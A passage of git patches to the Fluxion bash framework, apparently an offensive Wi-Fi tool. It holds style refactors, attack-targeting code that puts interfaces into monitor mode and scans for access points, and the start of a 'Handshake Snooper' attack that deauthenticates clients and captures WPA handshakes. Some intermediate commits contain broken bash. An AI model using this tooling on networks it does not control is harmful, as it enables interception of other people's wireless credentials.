FLUXIONCleanupAndClosingNotice="Aufräumen und schließen" -FLUXIONKillingProcessNotice="Killing ${CGry}\$targetID$CClr" +FLUXIONKillingProcessNotice="Beende ${CGry}\$targetID$CClr" FLUXIONRestoringPackageManagerNotice="Restoring ${CCyn}\$PackageManagerCLT$CClr" FLUXIONDisablingMonitorNotice="Deaktivierung der Netzwerkkarte" FLUXIONDisablingExtraInterfacesNotice="Deaktivierung der Netzwerkkarte" From 0e2bb3a4bd302427f51adff70907ca05a55c8b6d Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 9 Jan 2018 14:43:40 -0600 Subject: [PATCH 10/45] Corrected loops, & if statements to follow style guide. --- fluxion | 163 ++++++++++++++++++++++++++++++-------------------------- 1 file changed, 86 insertions(+), 77 deletions(-) diff --git a/fluxion b/fluxion index 22862a1..f83c6d7 100755 --- a/fluxion +++ b/fluxion @@ -28,33 +28,33 @@ declare -r FLUXIONRevision=0 # ============================================================ # # ================= < Script Sanity Checks > ================= # # ============================================================ # -if [ $EUID -ne 0 ] # Super User Check - then echo -e "Aborted, please execute the script as root."; exit 1 +if [ $EUID -ne 0 ]; then # Super User Check + echo -e "Aborted, please execute the script as root."; exit 1 fi # ===================== < XTerm Checks > ===================== # # TODO: Run the checks below only if we're not using tmux. -if [ ! "${DISPLAY:-}" ] # Assure display is available. - then echo -e "Aborted, X (graphical) session unavailable."; exit 2 +if [ ! "${DISPLAY:-}" ]; then # Assure display is available. + echo -e "Aborted, X (graphical) session unavailable."; exit 2 fi -if ! hash xdpyinfo 2>/dev/null # Assure display probe possible. - then echo -e "Aborted, xdpyinfo is unavailable."; exit 3 +if ! hash xdpyinfo 2>/dev/null; then # Assure display probe. + echo -e "Aborted, xdpyinfo is unavailable."; exit 3 fi -if ! xdpyinfo &>/dev/null # Assure display info is available. - then echo -e "Aborted, xterm test session failed."; exit 3 +if ! xdpyinfo &>/dev/null; then # Assure display info available. + echo -e "Aborted, xterm test session failed."; exit 3 fi # ================ < Parameter Parser Check > ================ # getopt --test > /dev/null # Assure enhanced getopt (returns 4). -if [ $? -ne 4 ] - then echo "Aborted, enhanced getopt isn't available."; exit 4 +if [ $? -ne 4 ]; then + echo "Aborted, enhanced getopt isn't available."; exit 4 fi # =============== < Working Directory Check > ================ # -if ! mkdir -p "$FLUXIONWorkspacePath" &> /dev/null - then echo "Aborted, can't generate a workspace directory."; exit 5 +if ! mkdir -p "$FLUXIONWorkspacePath" &> /dev/null; then + echo "Aborted, can't generate a workspace directory."; exit 5 fi # Once sanity check is passed, we can start to load everything. @@ -105,8 +105,8 @@ while [ "$1" != "--" ]; do -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; - -l|--language) FLUXIONLanguage=$2; shift;; - -a|--attack) FLUXIONAttack=$2; shift;; + -l|--language) FluxionLanguage=$2; shift;; + -a|--attack) FluxionAttack=$2; shift;; esac shift # Shift new parameters done @@ -118,32 +118,32 @@ shift # Remove "--" to prepare for attacks to read parameters. # Load user-defined preferences if there's an executable script. # If no script exists, prepare one for the user to store config. # WARNING: Preferences file must assure no redeclared constants. -if [ -x "$FLUXIONPreferencesFile" ] - then source "$FLUXIONPreferencesFile" +if [ -x "$FLUXIONPreferencesFile" ]; then + source "$FLUXIONPreferencesFile" else echo '#!/bin/bash' > "$FLUXIONPreferencesFile" chmod u+x "$FLUXIONPreferencesFile" fi # ================ < Configurable Constants > ================ # -if [ "$FLUXIONAuto" != "1" ] # If defined, assure 1. - then declare -r FLUXIONAuto=${FLUXIONAuto:+1} +if [ "$FLUXIONAuto" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONAuto=${FLUXIONAuto:+1} fi -if [ "$FLUXIONDebug" != "1" ] # If defined, assure 1. - then declare -r FLUXIONDebug=${FLUXIONDebug:+1} +if [ "$FLUXIONDebug" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONDebug=${FLUXIONDebug:+1} fi -if [ "$FLUXIONAirmonNG" != "1" ] # If defined, assure 1. - then declare -r FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} +if [ "$FLUXIONAirmonNG" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} fi -if [ "$FLUXIONWIKillProcesses" != "1" ] # If defined, assure 1. - then declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} +if [ "$FLUXIONWIKillProcesses" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} fi -if [ "$FLUXIONWIReloadDriver" != "1" ] # If defined, assure 1. - then declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} +if [ "$FLUXIONWIReloadDriver" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} fi # FLUXIONDebug [Normal Mode "" / Developer Mode 1] @@ -217,13 +217,14 @@ function fluxion_startup() { clear - if [ "$FLUXIONAuto" ] - then echo -e "$CBlu" - else echo -e "$CRed" + if [ "$FLUXIONAuto" ]; then + echo -e "$CBlu" + else + echo -e "$CRed" fi - for line in "${banner[@]}" - do echo "$line"; sleep 0.05 + for line in "${banner[@]}"; do + echo "$line"; sleep 0.05 done echo # Do not remove. @@ -274,8 +275,8 @@ function fluxion_shutdown() { if [ $FLUXIONDebug ]; then return 1; fi # Show the header if the subroutine has already been loaded. - if type -t fluxion_header &> /dev/null - then fluxion_header + if type -t fluxion_header &> /dev/null; then + fluxion_header fi echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" @@ -376,12 +377,12 @@ function fluxion_conditional_bail() { } # ERROR Report only in Developer Mode -if [ $FLUXIONDebug ] +if [ $FLUXIONDebug ]; then function fluxion_error_report() { echo "Exception caught @ line #$1" } - then trap 'fluxion_error_report $LINENO' ERR + trap 'fluxion_error_report $LINENO' ERR fi function fluxion_handle_abort_attack() { @@ -544,8 +545,8 @@ function fluxion_do_sequence() { local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then - if ! fluxion_undo $__fluxion_do_sequence__namespace - then break + if ! fluxion_undo; then $__fluxion_do_sequence__namespace + break fi fi @@ -555,7 +556,9 @@ function fluxion_do_sequence() { local __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} - if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then return -4; fi + if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then + return -4 + fi __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence["$__fluxion_do_sequence__instructionIndex"]} done @@ -585,15 +588,15 @@ function fluxion_header() { # ======================= < Language > ======================= # function fluxion_unset_language() { - FLUXIONLanguage="" + FluxionLanguage="" if [ "$FLUXIONPreferencesFile" ]; then - sed -i.backup "/FLUXIONLanguage=.\+/ d" "$FLUXIONPreferencesFile" + sed -i.backup "/FluxionLanguage=.\+/ d" "$FLUXIONPreferencesFile" fi } function fluxion_set_language() { - if [ ! "$FLUXIONLanguage" ]; then + if [ ! "$FluxionLanguage" ]; then # Get all languages available. local languageCodes readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') @@ -609,34 +612,34 @@ function fluxion_set_language() { "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" \ languageCodes[@] languages[@] - FLUXIONLanguage=${IOQueryFormatFields[0]} + FluxionLanguage=${IOQueryFormatFields[0]} echo # Do not remove. fi # Check if all language files are present for the selected language. find -type d -name language | while read language_dir; do - if [ ! -e "$language_dir/${FLUXIONLanguage}.sh" ]; then + if [ ! -e "$language_dir/${FluxionLanguage}.sh" ]; then echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" - echo -e "\t$language_dir/${FLUXIONLanguage}.sh" + echo -e "\t$language_dir/${FluxionLanguage}.sh" return 1 fi done if [ $? -eq 1 ]; then # If a file is missing, fall back to english. echo -e "\n\n$FLUXIONVLine Falling back to English..."; sleep 5 - FLUXIONLanguage="en" + FluxionLanguage="en" fi - source "$FLUXIONPath/language/$FLUXIONLanguage.sh" + source "$FLUXIONPath/language/$FluxionLanguage.sh" if [ "$FLUXIONPreferencesFile" ]; then if more $FLUXIONPreferencesFile | \ - grep -q "FLUXIONLanguage=.\+" &> /dev/null; then - sed -r "s/FLUXIONLanguage=.+/FLUXIONLanguage=$FLUXIONLanguage/g" \ + grep -q "FluxionLanguage=.\+" &> /dev/null; then + sed -r "s/FluxionLanguage=.+/FluxionLanguage=$FluxionLanguage/g" \ -i.backup "$FLUXIONPreferencesFile" else - echo "FLUXIONLanguage=$FLUXIONLanguage" >> "$FLUXIONPreferencesFile" + echo "FluxionLanguage=$FluxionLanguage" >> "$FLUXIONPreferencesFile" fi fi } @@ -659,20 +662,20 @@ function fluxion_deallocate_interface() { # Release interfaces rfkill unblock all &> $FLUXIONOutputDevice # Attempt deactivating monitor mode on the interface. - if interface_set_mode $oldIdentifier managed - then return 3 + if interface_set_mode $oldIdentifier managed; then + return 3 fi fi # If interface was allocated by airmon-ng, deallocate with it. if [[ "$oldIdentifier" == *"mon"* ]]; then - if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice - then return 4 + if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice; then + return 4 fi else # Attempt to restore the original interface identifier. - if ! interface_reidentify $oldIdentifier $newIdentifier - then return 5 + if ! interface_reidentify $oldIdentifier $newIdentifier; then + return 5 fi fi @@ -727,8 +730,8 @@ function fluxion_allocate_interface() { # Reserve interfaces echo -e "$FLUXIONVLine "$( io_dynamic_output $FLUXIONUnloadingWIDriverNotice ) - while interface_physical "$identifier" - do sleep 1 + while interface_physical "$identifier"; do + sleep 1 done fi @@ -742,8 +745,8 @@ function fluxion_allocate_interface() { # Reserve interfaces # TODO: Make the loop below airmon-ng independent. # Maybe replace it with a list of network-managers? # WARNING: Version differences could break code below. - for program in "`airmon-ng check | awk 'NR>6{print $2}'`" - do killall "$program" &> $FLUXIONOutputDevice + for program in "`airmon-ng check | awk 'NR>6{print $2}'`"; do + killall "$program" &> $FLUXIONOutputDevice done fi @@ -755,8 +758,8 @@ function fluxion_allocate_interface() { # Reserve interfaces echo -e "$FLUXIONVLine "$( io_dynamic_output $FLUXIONLoadingWIDriverNotice ) - while ! interface_physical "$identifier" - do sleep 1 + while ! interface_physical "$identifier"; do + sleep 1 done fi @@ -769,14 +772,15 @@ function fluxion_allocate_interface() { # Reserve interfaces if [ ! $FLUXIONAirmonNG ]; then echo -e "$FLUXIONVLine $FLUXIONReidentifyingInterface" - if [ $allocatingWirelessInterface ] - # Prevent interface-snatching by renaming the interface. - then interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} - else interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} + # Prevent interface-snatching by renaming the interface. + if [ $allocatingWirelessInterface ]; then + interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} + else + interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} fi - if [ $? -ne 0 ] # If reidentifying failed, abort immediately. - then return 4 + if [ $? -ne 0 ]; then # If reidentifying failed, abort immediately. + return 4 fi fi @@ -792,14 +796,19 @@ function fluxion_allocate_interface() { # Reserve interfaces # NOTICE: Conditionals below populate newIdentifier on success. if [ $FLUXIONAirmonNG ]; then - local -r newIdentifier=$(airmon-ng start $identifier | grep "monitor .* enabled" | grep -oP "wl.*mon|mon[0-9]+") + local -r newIdentifier=$( + airmon-ng start $identifier | + grep "monitor .* enabled" | + grep -oP "wl.*mon|mon[0-9]+" + ) else # Attempt activating monitor mode on the interface. - if interface_set_mode fluxwl${#FluxionInterfaces[@]} monitor + if interface_set_mode fluxwl${#FluxionInterfaces[@]} monitor; then # Register the new identifier upon consecutive successes. - then local -r newIdentifier=fluxwl${#FluxionInterfaces[@]} + local -r newIdentifier=fluxwl${#FluxionInterfaces[@]} + else # If monitor-mode switch fails, undo rename and abort. - else interface_reidentify fluxwl${#FluxionInterfaces[@]} $identifier + interface_reidentify fluxwl${#FluxionInterfaces[@]} $identifier fi fi fi @@ -1337,7 +1346,7 @@ function fluxion_set_attack() { local descriptions readarray -t descriptions < <( - head -n 3 attacks/*/language/$FLUXIONLanguage.sh | \ + head -n 3 attacks/*/language/$FluxionLanguage.sh | \ grep -E "^# description: " | sed -E 's/# \w+: //' ) @@ -1346,7 +1355,7 @@ function fluxion_set_attack() { local attack for attack in "${attacks[@]}"; do local identifier=$( - head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | \ + head -n 3 "attacks/$attack/language/$FluxionLanguage.sh" | \ grep -E "^# identifier: " | sed -E 's/# \w+: //' ) if [ "$identifier" ]; then identifiers+=("$identifier") @@ -1383,12 +1392,12 @@ function fluxion_prep_attack() { local -r path="$FLUXIONPath/attacks/$FluxionAttack" if [ ! -x "$path/attack.sh" ]; then return 1; fi - if [ ! -x "$path/language/$FLUXIONLanguage.sh" ]; then return 2; fi + if [ ! -x "$path/language/$FluxionLanguage.sh" ]; then return 2; fi # Load attack and its corresponding language file. # Notice: If the attack is a targetted attack, sourcing # will define the constant FLUXIONAttackTargetted. - source "$path/language/$FLUXIONLanguage.sh" + source "$path/language/$FluxionLanguage.sh" source "$path/attack.sh" if ! prep_attack "$@"; then @@ -1498,8 +1507,8 @@ function fluxion_main() { "run_attack" \ ) - while true # Fluxion's runtime-loop. - do fluxion_do_sequence fluxion sequence[@] + while true; do # Fluxion's runtime-loop. + fluxion_do_sequence fluxion sequence[@] done fluxion_shutdown From 7a61592df535535f8c08f39ac2994b2076e527c2 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 9 Jan 2018 15:20:11 -0600 Subject: [PATCH 11/45] Corrected subroutines to follow POSIX syntax. --- fluxion | 76 +++++++++++++++++++++++++++++---------------------------- 1 file changed, 39 insertions(+), 37 deletions(-) diff --git a/fluxion b/fluxion index f83c6d7..137213f 100755 --- a/fluxion +++ b/fluxion @@ -191,7 +191,7 @@ source "$FLUXIONPath/language/en.sh" # ============================================================ # # ================== < Startup & Shutdown > ================== # # ============================================================ # -function fluxion_startup() { +fluxion_startup() { if [ "$FLUXIONDebug" ]; then return 1; fi local banner=() @@ -271,7 +271,7 @@ function fluxion_startup() { echo -e "\n\n" # This echo is for spacing } -function fluxion_shutdown() { +fluxion_shutdown() { if [ $FLUXIONDebug ]; then return 1; fi # Show the header if the subroutine has already been loaded. @@ -360,12 +360,12 @@ function fluxion_shutdown() { # ================= < Handler Subroutines > ================== # # ============================================================ # # Delete log only in Normal Mode ! -function fluxion_conditional_clear() { +fluxion_conditional_clear() { # Clear iff we're not in debug mode if [ ! $FLUXIONDebug ]; then clear; fi } -function fluxion_conditional_bail() { +fluxion_conditional_bail() { echo ${1:-"Something went wrong, whoops! (report this)"} sleep 5 if [ ! $FLUXIONDebug ]; then @@ -385,7 +385,7 @@ if [ $FLUXIONDebug ]; then trap 'fluxion_error_report $LINENO' ERR fi -function fluxion_handle_abort_attack() { +fluxion_handle_abort_attack() { if [ $(type -t stop_attack) ]; then stop_attack &> $FLUXIONOutputDevice unprep_attack &> $FLUXIONOutputDevice @@ -397,7 +397,7 @@ function fluxion_handle_abort_attack() { # In case of abort signal, abort any attacks currently running. trap fluxion_handle_abort_attack SIGABRT -function fluxion_handle_exit() { +fluxion_handle_exit() { fluxion_handle_abort_attack fluxion_shutdown exit 1 @@ -410,7 +410,7 @@ trap fluxion_handle_exit SIGINT SIGHUP # ============================================================ # # =============== < Resolution & Positioning > =============== # # ============================================================ # -function fluxion_set_resolution() { # Windows + Resolution +fluxion_set_resolution() { # Windows + Resolution # Calc options RATIO=4 @@ -467,7 +467,7 @@ declare -rA FLUXIONUndoable=( \ # Yes, I know, the identifiers are fucking ugly. If only we had # some type of mangling with bash identifiers, that'd be great. -function fluxion_do() { +fluxion_do() { if [ ${#@} -lt 2 ]; then return -1; fi local -r __fluxion_do__namespace=$1 @@ -478,7 +478,7 @@ function fluxion_do() { return $? } -function fluxion_undo() { +fluxion_undo() { if [ ${#@} -ne 1 ]; then return -1; fi local -r __fluxion_undo__namespace=$1 @@ -501,7 +501,7 @@ function fluxion_undo() { return -2 # The undo-chain failed. } -function fluxion_done() { +fluxion_done() { if [ ${#@} -ne 1 ]; then return -1; fi local -r __fluxion_done__namespace=$1 @@ -511,7 +511,7 @@ function fluxion_done() { if [ ! "$FluxionDone" ]; then return 1; fi } -function fluxion_done_reset() { +fluxion_done_reset() { if [ ${#@} -ne 1 ]; then return -1; fi local -r __fluxion_done_reset__namespace=$1 @@ -519,7 +519,7 @@ function fluxion_done_reset() { eval FXDLog_$__fluxion_done_reset__namespace=\(\) } -function fluxion_do_sequence() { +fluxion_do_sequence() { if [ ${#@} -ne 2 ]; then return -1; fi # TODO: Implement an alternative, better method of doing @@ -568,7 +568,7 @@ function fluxion_do_sequence() { # ============================================================ # # ================= < Load All Subroutines > ================= # # ============================================================ # -function fluxion_header() { +fluxion_header() { format_apply_autosize "[%*s]\n" local verticalBorder=$FormatApplyAutosize @@ -587,7 +587,7 @@ function fluxion_header() { } # ======================= < Language > ======================= # -function fluxion_unset_language() { +fluxion_unset_language() { FluxionLanguage="" if [ "$FLUXIONPreferencesFile" ]; then @@ -595,7 +595,7 @@ function fluxion_unset_language() { fi } -function fluxion_set_language() { +fluxion_set_language() { if [ ! "$FluxionLanguage" ]; then # Get all languages available. local languageCodes @@ -647,7 +647,7 @@ function fluxion_set_language() { # ====================== < Interfaces > ====================== # declare -A FluxionInterfaces=() # Global interfaces' registry. -function fluxion_deallocate_interface() { # Release interfaces +fluxion_deallocate_interface() { # Release interfaces if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi local -r oldIdentifier=$1 @@ -691,7 +691,7 @@ function fluxion_deallocate_interface() { # Release interfaces # Return 3: Unable to determine interface's driver. # Return 4: Fluxion failed to reidentify interface. # Return 5: Interface allocation failed (identifier missing). -function fluxion_allocate_interface() { # Reserve interfaces +fluxion_allocate_interface() { # Reserve interfaces if [ ! "$1" ]; then return 1; fi local -r identifier=$1 @@ -838,7 +838,7 @@ function fluxion_allocate_interface() { # Reserve interfaces # ------------------------------------------------------------ # # Return -1: Go back # Return 1: Missing interfaces lambda identifier (not passed). -function fluxion_get_interface() { +fluxion_get_interface() { if ! type -t "$1" &> /dev/null; then return 1; fi while true; do @@ -925,7 +925,7 @@ function fluxion_get_interface() { # Return 2: Xterm failed to start airmon-ng. # Return 3: Invalid capture file was generated. # Return 4: No candidates were detected. -function fluxion_target_get_candidates() { +fluxion_target_get_candidates() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi @@ -989,7 +989,7 @@ function fluxion_target_get_candidates() { } -function fluxion_get_target() { +fluxion_get_target() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi @@ -1147,7 +1147,7 @@ function fluxion_get_target() { FluxionTargetRogueMAC="${FluxionTargetMAC::13}${rogueMACHex:1:1}${FluxionTargetMAC:14:4}" } -function fluxion_target_show() { +fluxion_target_show() { format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" local colorlessFormat="$FormatApplyAutosize" @@ -1165,7 +1165,7 @@ function fluxion_target_show() { # =================== < Hash Subroutines > =================== # # Parameters: [channel [encryption [maker]]] -function fluxion_hash_verify() { +fluxion_hash_verify() { if [ ${#@} -lt 3 ]; then return 1; fi local -r hashPath=$1 @@ -1238,12 +1238,12 @@ function fluxion_hash_verify() { if [ $hashResult -ne 0 ]; then return 1; fi } -function fluxion_hash_unset_path() { +fluxion_hash_unset_path() { FluxionHashPath="" } # Parameters: [channel [encryption [maker]]] -function fluxion_hash_set_path() { +fluxion_hash_set_path() { if [ "$FluxionHashPath" ]; then return 0; fi fluxion_hash_unset_path @@ -1308,7 +1308,7 @@ function fluxion_hash_set_path() { } # Paramters: -function fluxion_hash_get() { +fluxion_hash_get() { # Assure we've got the bssid and the essid passed in. if [ ${#@} -lt 2 ]; then return 1; fi @@ -1325,11 +1325,11 @@ function fluxion_hash_get() { # ================== < Attack Subroutines > ================== # -function fluxion_unset_attack() { +fluxion_unset_attack() { FluxionAttack="" } -function fluxion_set_attack() { +fluxion_set_attack() { if [ "$FluxionAttack" ]; then return 0; fi fluxion_unset_attack @@ -1380,7 +1380,7 @@ function fluxion_set_attack() { FluxionAttack=${IOQueryFormatFields[0]} } -function fluxion_unprep_attack() { +fluxion_unprep_attack() { if type -t unprep_attack &> /dev/null; then unprep_attack fi @@ -1388,7 +1388,7 @@ function fluxion_unprep_attack() { return 1 # Trigger another undo since prep isn't significant. } -function fluxion_prep_attack() { +fluxion_prep_attack() { local -r path="$FLUXIONPath/attacks/$FluxionAttack" if [ ! -x "$path/attack.sh" ]; then return 1; fi @@ -1399,6 +1399,8 @@ function fluxion_prep_attack() { # will define the constant FLUXIONAttackTargetted. source "$path/language/$FluxionLanguage.sh" source "$path/attack.sh" + + if if ! prep_attack "$@"; then fluxion_unprep_attack @@ -1406,7 +1408,7 @@ function fluxion_prep_attack() { fi } -function fluxion_run_attack() { +fluxion_run_attack() { start_attack local choices=( \ @@ -1436,7 +1438,7 @@ function fluxion_run_attack() { # ============================================================ # # =================== < Test Subroutines > =================== # # ============================================================ # -function subtest1() { +subtest1() { local interface interface_list_all for interface in "${InterfaceListAll[@]}"; do @@ -1495,16 +1497,16 @@ shift # Remove "--" to prepare for attacks to read parameters. # ============================================================ # # ===================== < FLUXION Loop > ===================== # # ============================================================ # -function fluxion_main() { +fluxion_main() { fluxion_startup fluxion_set_resolution - local -r sequence=( \ - "set_language" \ - "set_attack" \ - "prep_attack" \ - "run_attack" \ + local -r sequence=( + "set_language" + "set_attack" + "prep_attack" + "run_attack" ) while true; do # Fluxion's runtime-loop. From 3185ca9ad8239ebea546b2420d27efed9b7a2b5b Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 10 Jan 2018 20:17:08 -0600 Subject: [PATCH 12/45] Added attack targetting, minor bug & styling fixes. Added optional targetting functionality for attacks opting to use it. Fixed bugs caused by line length reduction (improperly escaping line). Corrected old tick-marks to new sub-shell marks ($()). --- fluxion | 57 +++++++++++++++++++++++++++++++++++---------------------- 1 file changed, 35 insertions(+), 22 deletions(-) diff --git a/fluxion b/fluxion index 137213f..cba1b78 100755 --- a/fluxion +++ b/fluxion @@ -545,7 +545,7 @@ fluxion_do_sequence() { local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then - if ! fluxion_undo; then $__fluxion_do_sequence__namespace + if ! fluxion_undo $__fluxion_do_sequence__namespace; then $__fluxion_do_sequence__namespace break fi fi @@ -745,7 +745,7 @@ fluxion_allocate_interface() { # Reserve interfaces # TODO: Make the loop below airmon-ng independent. # Maybe replace it with a list of network-managers? # WARNING: Version differences could break code below. - for program in "`airmon-ng check | awk 'NR>6{print $2}'`"; do + for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do killall "$program" &> $FLUXIONOutputDevice done fi @@ -849,7 +849,7 @@ fluxion_get_interface() { local interfacesAvailableState=() # Gather information from all available interfaces. - local -r interfacesAvailableCount=${#interfacesAvailable[@]} + local interfacesAvailableCount=${#interfacesAvailable[@]} local i for (( i = 0; i < interfacesAvailableCount; i++ )); do @@ -880,9 +880,10 @@ fluxion_get_interface() { # If only one interface exists and it's not unavailable, choose it. if [ "${#interfacesAvailable[@]}" -eq 1 -a \ "${interfacesAvailableState[0]}" != "[-]" ]; then - FluxionGetInterfaceSelected="${interfacesAvailable[0]}" - FluxionGetInterfaceSelectedState="${interfacesAvailableState[0]}" - FluxionGetInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + FluxionInterfaceSelected="${interfacesAvailable[0]}" + FluxionInterfaceSelectedState="${interfacesAvailableState[0]}" + FluxionInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + break else interfacesAvailable+=( \ "$FLUXIONGeneralRepeatOption" \ @@ -907,14 +908,14 @@ fluxion_get_interface() { case "${IOQueryFormatFields[1]}" in "$FLUXIONGeneralRepeatOption") continue;; "$FLUXIONGeneralBackOption") return -1;; - *) break;; + *) + FluxionInterfaceSelected="${IOQueryFormatFields[1]}" + FluxionInterfaceSelectedState="${IOQueryFormatFields[2]}" + FluxionInterfaceSelectedInfo="${IOQueryFormatFields[3]}" + break;; esac fi done - - FluxionInterfaceSelected="${IOQueryFormatFields[1]}" - FluxionInterfaceSelectedState="${IOQueryFormatFields[2]}" - FluxionInterfaceSelectedInfo="${IOQueryFormatFields[3]}" } @@ -970,11 +971,11 @@ fluxion_target_get_candidates() { # ) local -r matchMAC="([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]" readarray FluxionTargetCandidates < <( - awk -F, "NF==15 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" + awk -F, "NF==15 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" \ "$FLUXIONWorkspacePath/dump-01.csv" ) readarray FluxionTargetCandidatesClients < <( - awk -F, "NF==7 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" + awk -F, "NF==7 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" \ "$FLUXIONWorkspacePath/dump-01.csv" ) @@ -1089,10 +1090,10 @@ fluxion_get_target() { else # Bash doesn't support floating point division, work around it... # Q = ((P - F) / (C - F)); Q-quality, P-power, F-floor, C-Ceiling. - candidatesQuality[i]=$( - ((${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / \ - (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10)) - ) + candidatesQuality[i]=$(( \ + (${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / \ + (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10) \ + )) fi done @@ -1221,8 +1222,8 @@ fluxion_hash_verify() { hash_check_handshake \ "$verifier" \ "$hashPath" \ - "$APTargetSSID" \ - "$APTargetMAC" + "$hashESSID" \ + "$hashBSSID" local -r hashResult=$? @@ -1399,8 +1400,20 @@ fluxion_prep_attack() { # will define the constant FLUXIONAttackTargetted. source "$path/language/$FluxionLanguage.sh" source "$path/attack.sh" - - if + + # Check if attack is targetted & set the attack target. + if type -t attack_targetting_interfaces &> /dev/null; then + if ! fluxion_get_interface attack_targetting_interfaces; then + return 3 + fi + if ! fluxion_allocate_interface $FluxionInterfaceSelected; then + return 4 + fi + if ! fluxion_get_target \ + ${FluxionInterfaces[$FluxionInterfaceSelected]}; then + return 5 + fi + fi if ! prep_attack "$@"; then fluxion_unprep_attack @@ -1417,7 +1430,7 @@ fluxion_run_attack() { ) io_query_choice \ - "`io_dynamic_output $FLUXIONAttackInProgressNotice`" choices[@] + "$(io_dynamic_output $FLUXIONAttackInProgressNotice)" choices[@] echo From fb70dc01583cfe8de68dcacc1a6209c0dc7e13fb Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Thu, 11 Jan 2018 00:20:41 -0600 Subject: [PATCH 13/45] Handshake Snooper migration & bash bug workaround. Started upgrade of Handshake Snooper to fluxion 4. Redefined array constants as variables due to bash bug discovered. --- attacks/Handshake Snooper/attack.sh | 281 +++++++++++++++++++--------- fluxion | 22 ++- 2 files changed, 203 insertions(+), 100 deletions(-) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 84c39a3..2f9aff3 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -1,12 +1,27 @@ #!/bin/bash -########################### < Handshake Snooper Parameters > ########################### +# ============================================================ # +# ============= < Handshake Snooper Parameters > ============= # +# ============================================================ # HandshakeSnooperState="Not Ready" -################################# < Handshake Snooper > ################################ -function handshake_snooper_arbiter_daemon() { - if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then return 1; fi + +# ============================================================ # +# ========= < Handshake Snooper Helper Subroutines > ========= # +# ============================================================ # +handshake_snooper_header() { + fluxion_header; fluxion_target_show; echo +} + + +# ============================================================ # +# ============= < Handshake Snooper Subroutines > ============ # +# ============================================================ # +handshake_snooper_arbiter_daemon() { + if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then + return 1; + fi # Start daemon in the running state to continue execution until aborted, # or until a hash has been verified to exist in the capture file. @@ -15,13 +30,16 @@ function handshake_snooper_arbiter_daemon() { function handshake_snooper_arbiter_daemon_abort() { handshake_snooper_arbiter_daemon_state="aborted" - if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then kill $handshake_snooper_arbiter_daemon_viewerPID + if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then + kill $handshake_snooper_arbiter_daemon_viewerPID fi handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + local -r now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperArbiterAbortedWarning" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" exit 2 } @@ -34,10 +52,14 @@ function handshake_snooper_arbiter_daemon() { sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*" # Display some feedback to the user to assure verifier is working. - xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg 